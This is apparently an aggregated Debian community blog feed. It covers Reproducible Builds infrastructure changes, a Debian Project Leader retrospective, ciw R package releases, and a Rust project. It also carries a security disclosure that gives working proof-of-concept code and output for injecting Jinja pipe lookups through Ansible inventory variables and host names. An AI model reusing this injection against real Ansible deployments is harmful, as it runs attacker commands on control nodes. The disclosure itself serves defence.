    • Schedule untested packages with a higher priority, otherwise slow architectures cannot keep up with the experimental distribution growing. [ ]
    • Only create the stats_buildinfo.png graph once per day. [ ][ ]
    • Reproducible Debian dashboard: refactoring, update several more static stats only every 12h. [ ]
    • Document how to use systemctl with new systemd-based services. [ ]
    • Temporarily disable armhf and i386 continuous integration tests in order to get some stability back. [ ]
    • Use the deb.debian.org CDN everywhere. [ ]
    • Remove the rsyslog logging facility on bookworm systems. [ ]
    • Add zst to the list of packages which are false-positive diskspace issues. [ ]
    • Detect failures to bootstrap Debian base systems. [ ]
  • Arch Linux-related changes:
    • Temporarily disable builds because the pacman package manager is broken. [ ][ ]
    • Split reproducible_html_live_status and split the scheduling timing . [ ][ ][ ]
    • Improve handling when database is locked. [ ][ ]
  • Misc changes:
    • Show failed services that require manual cleanup. [ ][ ]
    • Integrate two new Infomaniak nodes. [ ][ ][ ][ ]
    • Improve IRC notifications for artifacts. [ ]
    • Run diffoscope in different systemd slices. [ ]
    • Run the node health check more often, as it can now repair some issues. [ ][ ]
    • Also include the string Bot in the userAgent for Git. (Re: #929013). [ ]
    • Document increased tmpfs size on our OUSL nodes. [ ]
    • Disable memory account for the reproducible_build service. [ ][ ]
    • Allow 10 times as many open files for the Jenkins service. [ ]
    • Set OOMPolicy=continue and OOMScoreAdjust=-1000 for both the Jenkins and the reproducible_build service. [ ]
Mattia Rizzolo also made the following changes:
  • Debian-related changes:
    • Define a systemd slice to group all relevant services. [ ][ ]
    • Add a bunch of quotes in scripts to assuage the shellcheck tool. [ ]
    • Add stats on how many packages have been built today so far. [ ]
    • Instruct systemd-run to handle diffoscope s exit codes specially. [ ]
    • Prefer the pgrep tool over grepping the output of ps. [ ]
    • Re-enable a couple of i386 and armhf architecture builders. [ ][ ]
    • Fix some stylistic issues flagged by the Python flake8 tool. [ ]
    • Cease scheduling Debian unstable and experimental on the armhf architecture due to the time_t transition. [ ]
    • Start a few more i386 & armhf workers. [ ][ ][ ]
    • Temporarly skip pbuilder updates in the unstable distribution, but only on the armhf architecture. [ ]
  • Other changes:
    • Perform some large-scale refactoring on how the systemd service operates. [ ][ ]
    • Move the list of workers into a separate file so it s accessible to a number of scripts. [ ]
    • Refactor the powercycle_x86_nodes.py script to use the new IONOS API and its new Python bindings. [ ]
    • Also fix nph-logwatch after the worker changes. [ ]
    • Do not install the stunnel tool anymore, it shouldn t be needed by anything anymore. [ ]
    • Move temporary directories related to Arch Linux into a single directory for clarity. [ ]
    • Update the arm64 architecture host keys. [ ]
    • Use a common Postfix configuration. [ ]
The following changes were also made by:
  • Jan-Benedict Glaw:
    • Initial work to clean up a messy NetBSD-related script. [ ][ ]
  • Roland Clobus:
    • Show the installer log if the installer fails to build. [ ]
    • Avoid the minus character (i.e. -) in a variable in order to allow for tags in openQA. [ ]
    • Update the schedule of Debian live image builds. [ ]
  • Vagrant Cascadian:
    • Maintenance on the virt* nodes is completed so bring them back online. [ ]
    • Use the fully qualified domain name in configuration. [ ]
Node maintenance was also performed by Holger Levsen, Mattia Rizzolo [ ][ ] and Vagrant Cascadian [ ][ ][ ][ ]

If you are interested in contributing to the Reproducible Builds project, please visit our Contribute page on our website. However, you can get in touch with us via:

3 April 2024

Guido G nther: Free Software Activities March 2024

A short status update of what happened on my side last month. I spent quiet a bit of time reviewing new, code (thanks!) as well as maintenance to keep things going but we also have some improvements: Phosh Phoc phosh-mobile-settings phosh-osk-stub gmobile Livi squeekboard GNOME calls Libsoup If you want to support my work see donations.

2 April 2024

Bits from Debian: Bits from the DPL

Dear Debianites This morning I decided to just start writing Bits from DPL and send whatever I have by 18:00 local time. Here it is, barely proof read, along with all it's warts and grammar mistakes! It's slightly long and doesn't contain any critical information, so if you're not in the mood, don't feel compelled to read it! Get ready for a new DPL! Soon, the voting period will start to elect our next DPL, and my time as DPL will come to an end. Reading the questions posted to the new candidates on debian-vote, it takes quite a bit of restraint to not answer all of them myself, I think I can see how that aspect contributed to me being reeled in to running for DPL! In total I've done so 5 times (the first time I ran, Sam was elected!). Good luck to both Andreas and Sruthi, our current DPL candidates! I've already started working on preparing handover, and there's multiple request from teams that have came in recently that will have to wait for the new term, so I hope they're both ready to hit the ground running! Things that I wish could have gone better Communication Recently, I saw a t-shirt that read:
Adulthood is saying, 'But after this week things will slow down a bit' over and over until you die.
I can relate! With every task, crisis or deadline that appears, I think that once this is over, I'll have some more breathing space to get back to non-urgent, but important tasks. "Bits from the DPL" was something I really wanted to get right this last term, and clearly failed spectacularly. I have two long Bits from the DPL drafts that I never finished, I tend to have prioritised problems of the day over communication. With all the hindsight I have, I'm not sure which is better to prioritise, I do rate communication and transparency very highly and this is really the top thing that I wish I could've done better over the last four years. On that note, thanks to people who provided me with some kind words when I've mentioned this to them before. They pointed out that there are many other ways to communicate and be in touch with the community, and they mentioned that they thought that I did a good job with that. Since I'm still on communication, I think we can all learn to be more effective at it, since it's really so important for the project. Every time I publicly spoke about us spending more money, we got more donations. People out there really like to see how we invest funds in to Debian, instead of just making it heap up. DSA just spent a nice chunk on money on hardware, but we don't have very good visibility on it. It's one thing having it on a public line item in SPI's reporting, but it would be much more exciting if DSA could provide a write-up on all the cool hardware they're buying and what impact it would have on developers, and post it somewhere prominent like debian-devel-announce, Planet Debian or Bits from Debian (from the publicity team). I don't want to single out DSA there, it's difficult and affects many other teams. The Salsa CI team also spent a lot of resources (time and money wise) to extend testing on AMD GPUs and other AMD hardware. It's fantastic and interesting work, and really more people within the project and in the outside world should know about it! I'm not going to push my agendas to the next DPL, but I hope that they continue to encourage people to write about their work, and hopefully at some point we'll build enough excitement in doing so that it becomes a more normal part of our daily work. Founding Debian as a standalone entity This was my number one goal for the project this last term, which was a carried over item from my previous terms. I'm tempted to write everything out here, including the problem statement and our current predicaments, what kind of ground work needs to happen, likely constitutional changes that need to happen, and the nature of the GR that would be needed to make such a thing happen, but if I start with that, I might not finish this mail. In short, I 100% believe that this is still a very high ranking issue for Debian, and perhaps after my term I'd be in a better position to spend more time on this (hmm, is this an instance of "The grass is always better on the other side", or "Next week will go better until I die?"). Anyway, I'm willing to work with any future DPL on this, and perhaps it can in itself be a delegation tasked to properly explore all the options, and write up a report for the project that can lead to a GR. Overall, I'd rather have us take another few years and do this properly, rather than rush into something that is again difficult to change afterwards. So while I very much wish this could've been achieved in the last term, I can't say that I have any regrets here either. My terms in a nutshell COVID-19 and Debian 11 era My first term in 2020 started just as the COVID-19 pandemic became known to spread globally. It was a tough year for everyone, and Debian wasn't immune against its effects either. Many of our contributors got sick, some have lost loved ones (my father passed away in March 2020 just after I became DPL), some have lost their jobs (or other earners in their household have) and the effects of social distancing took a mental and even physical health toll on many. In Debian, we tend to do really well when we get together in person to solve problems, and when DebConf20 got cancelled in person, we understood that that was necessary, but it was still more bad news in a year we had too much of it already. I can't remember if there was ever any kind of formal choice or discussion about this at any time, but the DebConf video team just kind of organically and spontaneously became the orga team for an online DebConf, and that lead to our first ever completely online DebConf. This was great on so many levels. We got to see each other's faces again, even though it was on screen. We had some teams talk to each other face to face for the first time in years, even though it was just on a Jitsi call. It had a lasting cultural change in Debian, some teams still have video meetings now, where they didn't do that before, and I think it's a good supplement to our other methods of communication. We also had a few online Mini-DebConfs that was fun, but DebConf21 was also online, and by then we all developed an online conference fatigue, and while it was another good online event overall, it did start to feel a bit like a zombieconf and after that, we had some really nice events from the Brazillians, but no big global online community events again. In my opinion online MiniDebConfs can be a great way to develop our community and we should spend some further energy into this, but hey! This isn't a platform so let me back out of talking about the future as I see it... Despite all the adversity that we faced together, the Debian 11 release ended up being quite good. It happened about a month or so later than what we ideally would've liked, but it was a solid release nonetheless. It turns out that for quite a few people, staying inside for a few months to focus on Debian bugs was quite productive, and Debian 11 ended up being a very polished release. During this time period we also had to deal with a previous Debian Developer that was expelled for his poor behaviour in Debian, who continued to harass members of the Debian project and in other free software communities after his expulsion. This ended up being quite a lot of work since we had to take legal action to protect our community, and eventually also get the police involved. I'm not going to give him the satisfaction by spending too much time talking about him, but you can read our official statement regarding Daniel Pocock here: https://www.debian.org/News/2021/20211117 In late 2021 and early 2022 we also discussed our general resolution process, and had two consequent votes to address some issues that have affected past votes: In my first term I addressed our delegations that were a bit behind, by the end of my last term all delegation requests are up to date. There's still some work to do, but I'm feeling good that I get to hand this over to the next DPL in a very decent state. Delegation updates can be very deceiving, sometimes a delegation is completely re-written and it was just 1 or 2 hours of work. Other times, a delegation updated can contain one line that has changed or a change in one team member that was the result of days worth of discussion and hashing out differences. I also received quite a few requests either to host a service, or to pay a third-party directly for hosting. This was quite an admin nightmare, it either meant we had to manually do monthly reimbursements to someone, or have our TOs create accounts/agreements at the multiple providers that people use. So, after talking to a few people about this, we founded the DebianNet team (we could've admittedly chosen a better name, but that can happen later on) for providing hosting at two different hosting providers that we have agreement with so that people who host things under debian.net have an easy way to host it, and then at the same time Debian also has more control if a site maintainer goes MIA. More info: https://wiki.debian.org/Teams/DebianNet You might notice some Openstack mentioned there, we had some intention to set up a Debian cloud for hosting these things, that could also be used for other additional Debiany things like archive rebuilds, but these have so far fallen through. We still consider it a good idea and hopefully it will work out some other time (if you're a large company who can sponsor few racks and servers, please get in touch!) DebConf22 and Debian 12 era DebConf22 was the first time we returned to an in-person DebConf. It was a bit smaller than our usual DebConf - understandably so, considering that there were still COVID risks and people who were at high risk or who had family with high risk factors did the sensible thing and stayed home. After watching many MiniDebConfs online, I also attended my first ever MiniDebConf in Hamburg. It still feels odd typing that, it feels like I should've been at one before, but my location makes attending them difficult (on a side-note, a few of us are working on bootstrapping a South African Debian community and hopefully we can pull off MiniDebConf in South Africa later this year). While I was at the MiniDebConf, I gave a talk where I covered the evolution of firmware, from the simple e-proms that you'd find in old printers to the complicated firmware in modern GPUs that basically contain complete operating systems- complete with drivers for the device their running on. I also showed my shiny new laptop, and explained that it's impossible to install that laptop without non-free firmware (you'd get a black display on d-i or Debian live). Also that you couldn't even use an accessibility mode with audio since even that depends on non-free firmware these days. Steve, from the image building team, has said for a while that we need to do a GR to vote for this, and after more discussion at DebConf, I kept nudging him to propose the GR, and we ended up voting in favour of it. I do believe that someone out there should be campaigning for more free firmware (unfortunately in Debian we just don't have the resources for this), but, I'm glad that we have the firmware included. In the end, the choice comes down to whether we still want Debian to be installable on mainstream bare-metal hardware. At this point, I'd like to give a special thanks to the ftpmasters, image building team and the installer team who worked really hard to get the changes done that were needed in order to make this happen for Debian 12, and for being really proactive for remaining niggles that was solved by the time Debian 12.1 was released. The included firmware contributed to Debian 12 being a huge success, but it wasn't the only factor. I had a list of personal peeves, and as the hard freeze hit, I lost hope that these would be fixed and made peace with the fact that Debian 12 would release with those bugs. I'm glad that lots of people proved me wrong and also proved that it's never to late to fix bugs, everything on my list got eliminated by the time final freeze hit, which was great! We usually aim to have a release ready about 2 years after the previous release, sometimes there are complications during a freeze and it can take a bit longer. But due to the excellent co-ordination of the release team and heavy lifting from many DDs, the Debian 12 release happened 21 months and 3 weeks after the Debian 11 release. I hope the work from the release team continues to pay off so that we can achieve their goals of having shorter and less painful freezes in the future! Even though many things were going well, the ongoing usr-merge effort highlighted some social problems within our processes. I started typing out the whole history of usrmerge here, but it's going to be too long for the purpose of this mail. Important questions that did come out of this is, should core Debian packages be team maintained? And also about how far the CTTE should really be able to override a maintainer. We had lots of discussion about this at DebConf22, but didn't make much concrete progress. I think that at some point we'll probably have a GR about package maintenance. Also, thank you to Guillem who very patiently explained a few things to me (after probably having have to done so many times to others before already) and to Helmut who have done the same during the MiniDebConf in Hamburg. I think all the technical and social issues here are fixable, it will just take some time and patience and I have lots of confidence in everyone involved. UsrMerge wiki page: https://wiki.debian.org/UsrMerge DebConf 23 and Debian 13 era DebConf23 took place in Kochi, India. At the end of my Bits from the DPL talk there, someone asked me what the most difficult thing I had to do was during my terms as DPL. I answered that nothing particular stood out, and even the most difficult tasks ended up being rewarding to work on. Little did I know that my most difficult period of being DPL was just about to follow. During the day trip, one of our contributors, Abraham Raji, passed away in a tragic accident. There's really not anything anyone could've done to predict or stop it, but it was devastating to many of us, especially the people closest to him. Quite a number of DebConf attendees went to his funeral, wearing the DebConf t-shirts he designed as a tribute. It still haunts me when I saw his mother scream "He was my everything! He was my everything!", this was by a large margin the hardest day I've ever had in Debian, and I really wasn't ok for even a few weeks after that and I think the hurt will be with many of us for some time to come. So, a plea again to everyone, please take care of yourself! There's probably more people that love you than you realise. A special thanks to the DebConf23 team, who did a really good job despite all the uphills they faced (and there were many!). As DPL, I think that planning for a DebConf is near to impossible, all you can do is show up and just jump into things. I planned to work with Enrico to finish up something that will hopefully save future DPLs some time, and that is a web-based DD certificate creator instead of having the DPL do so manually using LaTeX. It already mostly works, you can see the work so far by visiting https://nm.debian.org/person/ACCOUNTNAME/certificate/ and replacing ACCOUNTNAME with your Debian account name, and if you're a DD, you should see your certificate. It still needs a few minor changes and a DPL signature, but at this point I think that will be finished up when the new DPL start. Thanks to Enrico for working on this! Since my first term, I've been trying to find ways to improve all our accounting/finance issues. Tracking what we spend on things, and getting an annual overview is hard, especially over 3 trusted organisations. The reimbursement process can also be really tedious, especially when you have to provide files in a certain order and combine them into a PDF. So, at DebConf22 we had a meeting along with the treasurer team and Stefano Rivera who said that it might be possible for him to work on a new system as part of his Freexian work. It worked out, and Freexian funded the development of the system since then, and after DebConf23 we handled the reimbursements for the conference via the new reimbursements site: https://reimbursements.debian.net/ It's still early days, but over time it should be linked to all our TOs and we'll use the same category codes across the board. So, overall, our reimbursement process becomes a lot simpler, and also we'll be able to get information like how much money we've spent on any category in any period. It will also help us to track how much money we have available or how much we spend on recurring costs. Right now that needs manual polling from our TOs. So I'm really glad that this is a big long-standing problem in the project that is being fixed. For Debian 13, we're waving goodbye to the KFreeBSD and mipsel ports. But we're also gaining riscv64 and loongarch64 as release architectures! I have 3 different RISC-V based machines on my desk here that I haven't had much time to work with yet, you can expect some blog posts about them soon after my DPL term ends! As Debian is a unix-like system, we're affected by the Year 2038 problem, where systems that uses 32 bit time in seconds since 1970 run out of available time and will wrap back to 1970 or have other undefined behaviour. A detailed wiki page explains how this works in Debian, and currently we're going through a rather large transition to make this possible. I believe this is the right time for Debian to be addressing this, we're still a bit more than a year away for the Debian 13 release, and this provides enough time to test the implementation before 2038 rolls along. Of course, big complicated transitions with dependency loops that causes chaos for everyone would still be too easy, so this past weekend (which is a holiday period in most of the west due to Easter weekend) has been filled with dealing with an upstream bug in xz-utils, where a backdoor was placed in this key piece of software. An Ars Technica covers it quite well, so I won't go into all the details here. I mention it because I want to give yet another special thanks to everyone involved in dealing with this on the Debian side. Everyone involved, from the ftpmasters to security team and others involved were super calm and professional and made quick, high quality decisions. This also lead to the archive being frozen on Saturday, this is the first time I've seen this happen since I've been a DD, but I'm sure next week will go better! Looking forward It's really been an honour for me to serve as DPL. It might well be my biggest achievement in my life. Previous DPLs range from prominent software engineers to game developers, or people who have done things like complete Iron Man, run other huge open source projects and are part of big consortiums. Ian Jackson even authored dpkg and is now working on the very interesting tag2upload service! I'm a relative nobody, just someone who grew up as a poor kid in South Africa, who just really cares about Debian a lot. And, above all, I'm really thankful that I didn't do anything major to screw up Debian for good. Not unlike learning how to use Debian, and also becoming a Debian Developer, I've learned a lot from this and it's been a really valuable growth experience for me. I know I can't possible give all the thanks to everyone who deserves it, so here's a big big thanks to everyone who have worked so hard and who have put in many, many hours to making Debian better, I consider you all heroes! -Jonathan

20 March 2024

Dirk Eddelbuettel: ciw 0.0.2 on CRAN: Updates

A first revision of the still only one-week old (at CRAN) package ciw has been released to CRAN! It provides is a single (efficient) function incoming() (now along with an alias ciw()) which summarises the state of the incoming directories at CRAN. I happen to like having these things at my (shell) fingertips, so it goes along with (still draft) wrapper ciw.r that will be part of the next littler release. For example, when I do this right now as I type this, I see (typically less than one second later)
edd@rob:~$ ciw.r 
    Folder                     Name                Time   Size         Age
    <char>                   <char>              <POSc> <char>  <difftime>
1: pretest instantiate_0.2.2.tar.gz 2024-03-20 13:29:00    17K  0.07 hours
2: recheck   tinytable_0.2.0.tar.gz 2024-03-20 12:50:00   565K  0.72 hours
3: pending      Matrix_1.7-0.tar.gz 2024-03-20 12:05:00   2.3M  1.47 hours
4: recheck      survey_4.4-2.tar.gz 2024-03-20 02:02:00   2.2M 11.52 hours
5: waiting   equateIRT_2.4.0.tar.gz 2024-03-19 17:00:00   895K 20.55 hours
6: pending   ravetools_0.1.5.tar.gz 2024-03-19 12:06:00   1.0M 25.45 hours
7: waiting     glmmTMB_1.1.9.tar.gz 2024-03-18 16:04:00   4.2M 45.48 hours
edd@rob:~$ 
See ciw.r --help or ciw.r --usage for more. Alternatively, in your R session, you can call ciw::incoming() (or now ciw::ciw()) for the same result (and/or load the package first). This release adds some packaging touches, brings the new alias ciw() as well as a state variable with all (known) folder names and some internal improvements for dealing with error conditions. The NEWS entry follows.

Changes in version 0.0.2 (2024-03-20)
  • The package README and DESCRIPTION have been expanded
  • An alias ciw can now be used for incoming
  • Network error handling is now more robist
  • A state variable known_folders lists all CRAN folders below incoming

Courtesy of my CRANberries, there is also a diffstat report for this release. If you like this or other open-source work I do, you can sponsor me at GitHub.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

14 March 2024

Dirk Eddelbuettel: ciw 0.0.1 on CRAN: New Package!

Happy to share that ciw is now on CRAN! I had tooted a little bit about it, e.g., here. What it provides is a single (efficient) function incoming() which summarises the state of the incoming directories at CRAN. I happen to like having these things at my (shell) fingertips, so it goes along with (still draft) wrapper ciw.r that will be part of the next littler release. For example, when I do this right now as I type this, I see
edd@rob:~$ ciw.r
    Folder                   Name                Time   Size          Age
    <char>                 <char>              <POSc> <char>   <difftime>
1: waiting   maximin_1.0-5.tar.gz 2024-03-13 22:22:00    20K   2.48 hours
2: inspect    GofCens_0.97.tar.gz 2024-03-13 21:12:00    29K   3.65 hours
3: inspect verbalisr_0.5.2.tar.gz 2024-03-13 20:09:00    79K   4.70 hours
4: waiting    rnames_1.0.1.tar.gz 2024-03-12 15:04:00   2.7K  33.78 hours
5: waiting  PCMBase_1.2.14.tar.gz 2024-03-10 12:32:00   406K  84.32 hours
6: pending        MPCR_1.1.tar.gz 2024-02-22 11:07:00   903K 493.73 hours
edd@rob:~$ 
which is rather compact as CRAN kept busy! This call runs in about (or just over) one second, which includes launching r. Good enough for me. From a well-connected EC2 instance it is about 800ms on the command-line. When I do I from here inside an R session it is maybe 700ms. And doing it over in Europe is faster still. (I am using ping=FALSE for these to omit the default sanity check of can I haz networking? to speed things up. The check adds another 200ms or so.) The function (and the wrapper) offer a ton of options too this is ridiculously easy to do thanks to the docopt package:
edd@rob:~$ ciw.r -x
Usage: ciw.r [-h] [-x] [-a] [-m] [-i] [-t] [-p] [-w] [-r] [-s] [-n] [-u] [-l rows] [-z] [ARG...]

-m --mega           use 'mega' mode of all folders (see --usage)
-i --inspect        visit 'inspect' folder
-t --pretest        visit 'pretest' folder
-p --pending        visit 'pending' folder
-w --waiting        visit 'waiting' folder
-r --recheck        visit 'waiting' folder
-a --archive        visit 'archive' folder
-n --newbies        visit 'newbies' folder
-u --publish        visit 'publish' folder
-s --skipsort       skip sorting of aggregate results by age
-l --lines rows     print top 'rows' of the result object [default: 50]
-z --ping           run the connectivity check first
-h --help           show this help text
-x --usage          show help and short example usage 

where ARG... can be one or more file name, or directories or package names.

Examples:
  ciw.r -ip                            # run in 'inspect' and 'pending' mode
  ciw.r -a                             # run with mode 'auto' resolved in incoming()
  ciw.r                                # run with defaults, same as '-itpwr'

When no argument is given, 'auto' is selected which corresponds to 'inspect', 'waiting',
'pending', 'pretest', and 'recheck'. Selecting '-m' or '--mega' are select as default.

Folder selecting arguments are cumulative; but 'mega' is a single selections of all folders
(i.e. 'inspect', 'waiting', 'pending', 'pretest', 'recheck', 'archive', 'newbies', 'publish').

ciw.r is part of littler which brings 'r' to the command-line.
See https://dirk.eddelbuettel.com/code/littler.html for more information.
edd@rob:~$ 
The README at the git repo and the CRAN page offer a screenshot movie showing some of the options in action. I have been using the little tools quite a bit over the last two or three weeks since I first put it together and find it quite handy. With that again a big Thank You! of appcreciation for all that CRAN does which this week included letting this past the newbies desk in under 24 hours. If you like this or other open-source work I do, you can sponsor me at GitHub.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

11 March 2024

Evgeni Golov: Remote Code Execution in Ansible dynamic inventory plugins

I had reported this to Ansible a year ago (2023-02-23), but it seems this is considered expected behavior, so I am posting it here now. TL;DR Don't ever consume any data you got from an inventory if there is a chance somebody untrusted touched it. Inventory plugins Inventory plugins allow Ansible to pull inventory data from a variety of sources. The most common ones are probably the ones fetching instances from clouds like Amazon EC2 and Hetzner Cloud or the ones talking to tools like Foreman. For Ansible to function, an inventory needs to tell Ansible how to connect to a host (so e.g. a network address) and which groups the host belongs to (if any). But it can also set any arbitrary variable for that host, which is often used to provide additional information about it. These can be tags in EC2, parameters in Foreman, and other arbitrary data someone thought would be good to attach to that object. And this is where things are getting interesting. Somebody could add a comment to a host and that comment would be visible to you when you use the inventory with that host. And if that comment contains a Jinja expression, it might get executed. And if that Jinja expression is using the pipe lookup, it might get executed in your shell. Let that sink in for a moment, and then we'll look at an example. Example inventory plugin
from ansible.plugins.inventory import BaseInventoryPlugin
class InventoryModule(BaseInventoryPlugin):
    NAME = 'evgeni.inventoryrce.inventory'
    def verify_file(self, path):
        valid = False
        if super(InventoryModule, self).verify_file(path):
            if path.endswith('evgeni.yml'):
                valid = True
        return valid
    def parse(self, inventory, loader, path, cache=True):
        super(InventoryModule, self).parse(inventory, loader, path, cache)
        self.inventory.add_host('exploit.example.com')
        self.inventory.set_variable('exploit.example.com', 'ansible_connection', 'local')
        self.inventory.set_variable('exploit.example.com', 'something_funny', '  lookup("pipe", "touch /tmp/hacked" )  ')
The code is mostly copy & paste from the Developing dynamic inventory docs for Ansible and does three things:
  1. defines the plugin name as evgeni.inventoryrce.inventory
  2. accepts any config that ends with evgeni.yml (we'll need that to trigger the use of this inventory later)
  3. adds an imaginary host exploit.example.com with local connection type and something_funny variable to the inventory
In reality this would be talking to some API, iterating over hosts known to it, fetching their data, etc. But the structure of the code would be very similar. The crucial part is that if we have a string with a Jinja expression, we can set it as a variable for a host. Using the example inventory plugin Now we install the collection containing this inventory plugin, or rather write the code to ~/.ansible/collections/ansible_collections/evgeni/inventoryrce/plugins/inventory/inventory.py (or wherever your Ansible loads its collections from). And we create a configuration file. As there is nothing to configure, it can be empty and only needs to have the right filename: touch inventory.evgeni.yml is all you need. If we now call ansible-inventory, we'll see our host and our variable present:
% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-inventory -i inventory.evgeni.yml --list
 
    "_meta":  
        "hostvars":  
            "exploit.example.com":  
                "ansible_connection": "local",
                "something_funny": "  lookup(\"pipe\", \"touch /tmp/hacked\" )  "
             
         
     ,
    "all":  
        "children": [
            "ungrouped"
        ]
     ,
    "ungrouped":  
        "hosts": [
            "exploit.example.com"
        ]
     
 
(ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory is required to allow the use of our inventory plugin, as it's not in the default list.) So far, nothing dangerous has happened. The inventory got generated, the host is present, the funny variable is set, but it's still only a string. Executing a playbook, interpreting Jinja To execute the code we'd need to use the variable in a context where Jinja is used. This could be a template where you actually use this variable, like a report where you print the comment the creator has added to a VM. Or a debug task where you dump all variables of a host to analyze what's set. Let's use that!
- hosts: all
  tasks:
    - name: Display all variables/facts known for a host
      ansible.builtin.debug:
        var: hostvars[inventory_hostname]
This playbook looks totally innocent: run against all hosts and dump their hostvars using debug. No mention of our funny variable. Yet, when we execute it, we see:
% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-playbook -i inventory.evgeni.yml test.yml
PLAY [all] ************************************************************************************************
TASK [Gathering Facts] ************************************************************************************
ok: [exploit.example.com]
TASK [Display all variables/facts known for a host] *******************************************************
ok: [exploit.example.com] =>  
    "hostvars[inventory_hostname]":  
        "ansible_all_ipv4_addresses": [
            "192.168.122.1"
        ],
         
        "something_funny": ""
     
 
PLAY RECAP *************************************************************************************************
exploit.example.com  : ok=2    changed=0    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   
We got all variables dumped, that was expected, but now something_funny is an empty string? Jinja got executed, and the expression was lookup("pipe", "touch /tmp/hacked" ) and touch does not return anything. But it did create the file!
% ls -alh /tmp/hacked 
-rw-r--r--. 1 evgeni evgeni 0 Mar 10 17:18 /tmp/hacked
We just "hacked" the Ansible control node (aka: your laptop), as that's where lookup is executed. It could also have used the url lookup to send the contents of your Ansible vault to some internet host. Or connect to some VPN-secured system that should not be reachable from EC2/Hetzner/ . Why is this possible? This happens because set_variable(entity, varname, value) doesn't mark the values as unsafe and Ansible processes everything with Jinja in it. In this very specific example, a possible fix would be to explicitly wrap the string in AnsibleUnsafeText by using wrap_var:
from ansible.utils.unsafe_proxy import wrap_var
 
self.inventory.set_variable('exploit.example.com', 'something_funny', wrap_var('  lookup("pipe", "touch /tmp/hacked" )  '))
Which then gets rendered as a string when dumping the variables using debug:
"something_funny": "  lookup(\"pipe\", \"touch /tmp/hacked\" )  "
But it seems inventories don't do this:
for k, v in host_vars.items():
    self.inventory.set_variable(name, k, v)
(aws_ec2.py)
for key, value in hostvars.items():
    self.inventory.set_variable(hostname, key, value)
(hcloud.py)
for k, v in hostvars.items():
    try:
        self.inventory.set_variable(host_name, k, v)
    except ValueError as e:
        self.display.warning("Could not set host info hostvar for %s, skipping %s: %s" % (host, k, to_text(e)))
(foreman.py) And honestly, I can totally understand that. When developing an inventory, you do not expect to handle insecure input data. You also expect the API to handle the data in a secure way by default. But set_variable doesn't allow you to tag data as "safe" or "unsafe" easily and data in Ansible defaults to "safe". Can something similar happen in other parts of Ansible? It certainly happened in the past that Jinja was abused in Ansible: CVE-2016-9587, CVE-2017-7466, CVE-2017-7481 But even if we only look at inventories, add_host(host) can be abused in a similar way:
from ansible.plugins.inventory import BaseInventoryPlugin
class InventoryModule(BaseInventoryPlugin):
    NAME = 'evgeni.inventoryrce.inventory'
    def verify_file(self, path):
        valid = False
        if super(InventoryModule, self).verify_file(path):
            if path.endswith('evgeni.yml'):
                valid = True
        return valid
    def parse(self, inventory, loader, path, cache=True):
        super(InventoryModule, self).parse(inventory, loader, path, cache)
        self.inventory.add_host('lol  lookup("pipe", "touch /tmp/hacked-host" )  ')
% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-playbook -i inventory.evgeni.yml test.yml
PLAY [all] ************************************************************************************************
TASK [Gathering Facts] ************************************************************************************
fatal: [lol  lookup("pipe", "touch /tmp/hacked-host" )  ]: UNREACHABLE! =>  "changed": false, "msg": "Failed to connect to the host via ssh: ssh: Could not resolve hostname lol: No address associated with hostname", "unreachable": true 
PLAY RECAP ************************************************************************************************
lol  lookup("pipe", "touch /tmp/hacked-host" )   : ok=0    changed=0    unreachable=1    failed=0    skipped=0    rescued=0    ignored=0
% ls -alh /tmp/hacked-host
-rw-r--r--. 1 evgeni evgeni 0 Mar 13 08:44 /tmp/hacked-host
Affected versions I've tried this on Ansible (core) 2.13.13 and 2.16.4. I'd totally expect older versions to be affected too, but I have not verified that.

9 March 2024

Iustin Pop: Finally learning some Rust - hello photo-backlog-exporter!

After 4? 5? or so years of wanting to learn Rust, over the past 4 or so months I finally bit the bullet and found the motivation to write some Rust. And the subject. And I was, and still am, thoroughly surprised. It s like someone took Haskell, simplified it to some extents, and wrote a systems language out of it. Writing Rust after Haskell seems easy, and pleasant, and you: On the other hand: However, overall, one can clearly see there s more movement in Rust, and the quality of some parts of the toolchain is better (looking at you, rust-analyzer, compared to HLS). So, with that, I ve just tagged photo-backlog-exporter v0.1.0. It s a port of a Python script that was run as a textfile collector, which meant updates every ~15 minutes, since it was a bit slow to start, which I then rewrote in Go (but I don t like Go the language, plus the GC - if I have to deal with a GC, I d rather write Haskell), then finally rewrote in Rust. What does this do? It exports metrics for Prometheus based on the count, age and distribution of files in a directory. These files being, for me, the pictures I still have to sort, cull and process, because I never have enough free time to clear out the backlog. The script is kind of designed to work together with Corydalis, but since it doesn t care about file content, it can also double (easily) as simple file count/age exporter . And to my surprise, writing in Rust is soo pleasant, that the feature list is greater than the original Python script, and - compared to that untested script - I ve rather easily achieved a very high coverage ratio. Rust has multiple types of tests, and the combination allows getting pretty down to details on testing: I had to combine a (large) number of testing crates to get it expressive enough, but it was worth the effort. The last find from yesterday, assert_cmd, is excellent to describe testing/assertion in Rust itself, rather than via a separate, new DSL, like I was using shelltest for, in Haskell. To some extent, I feel like I found the missing arrow in the quiver. Haskell is good, quite very good for some type of workloads, but of course not all, and Rust complements that very nicely, with lots of overlap (as expected). Python can fill in any quick-and-dirty scripting needed. And I just need to learn more frontend, specifically Typescript (the language, not referring to any specific libraries/frameworks), and I ll be ready for AI to take over coding So, for now, I ll need to split my free time coding between all of the above, and keep exercising my skills. But so glad to have found a good new language!

Reproducible Builds: Reproducible Builds in February 2024

Welcome to the February 2024 report from the Reproducible Builds project! In our reports, we try to outline what we have been up to over the past month as well as mentioning some of the important things happening in software supply-chain security.

Reproducible Builds at FOSDEM 2024 Core Reproducible Builds developer Holger Levsen presented at the main track at FOSDEM on Saturday 3rd February this year in Brussels, Belgium. However, that wasn t the only talk related to Reproducible Builds. However, please see our comprehensive FOSDEM 2024 news post for the full details and links.

Maintainer Perspectives on Open Source Software Security Bernhard M. Wiedemann spotted that a recent report entitled Maintainer Perspectives on Open Source Software Security written by Stephen Hendrick and Ashwin Ramaswami of the Linux Foundation sports an infographic which mentions that 56% of [polled] projects support reproducible builds .

Mailing list highlights From our mailing list this month:

